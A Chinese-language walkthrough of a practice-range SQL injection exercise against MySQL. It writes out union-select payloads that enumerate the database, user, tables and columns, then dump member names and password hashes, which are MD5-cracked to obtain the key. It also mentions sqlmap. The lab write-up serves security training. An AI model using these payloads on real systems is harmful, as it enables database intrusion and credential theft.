墨者SQL注入入门手测(MySQL) – 作者:可乐kele

1617959582_60701a9e43b48577a9ce4.png!small

1.打开靶场,看到停机维护点进去别有洞天

1617959588_60701aa4ad342f4ccf188.png!small1617959592_60701aa871e3d3a40fe33.png!small

2.输入单引号发现报错    输入and 1=2

1617959598_60701aae8d5eb73bb2978.png!small1617959602_60701ab21f0079bbfda08.png!small

3.输入 ’ and ‘1’=’1   返回正常

1617959612_60701abc2ae63ee5ecdee.png!small

4.判断列数,输入 ‘ order by 5 –+ 和 ‘ order by 4 –+ 发现第一个报错,第二个正常,则说明其有4列

1617959625_60701ac90a62971e125db.png!small1617959628_60701acc6a21578a05099.png!small

5.采用联合查询(union select),判断剩下其他信息

判断位置:数据库名,用户名

输入id=’ union select 1,2,3,4–+

1617959634_60701ad227c12a4bcbec7.png!small

输入:id=’ union select ‘1’,database(),user(),’4 {因为上步操作已经将位置暴露为2和3,所以我们在2和3的位置输入数据库和用户名即可 或者如下图一个一个输入也可}

1617959638_60701ad6be4301a142d1e.png!small

id=’ union select ‘1’,’2′,database(),’4

1617959644_60701adc99121252c3035.png!small

id=’ union select ‘1’,’2′,user(),’4

1617959650_60701ae235a729d6555cb.png!small

猜解数据库中的表名:

‘ union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()–+

1617959655_60701ae727a73d72d00a6.png!small

查询数据库中的字段名:

‘ union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=database() and table_name=’stormgroup_member’–+

1617959661_60701aed72260fbdd90c9.png!small

查询字段对应的值:

‘ union select 1,group_concat(name),group_concat(password),4 from stormgroup_member–+

1617959673_60701af9da73c4b22b618.png!small

6.进行MD5解密登录找到KEY

1617959678_60701afec562aa7a3e845.png!small

7.同时也可以采用sqlmap的方法

1617959683_60701b037042118fc93f9.png!small

来源:freebuf.com 2021-04-09 17:15:42 by: 可乐kele

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论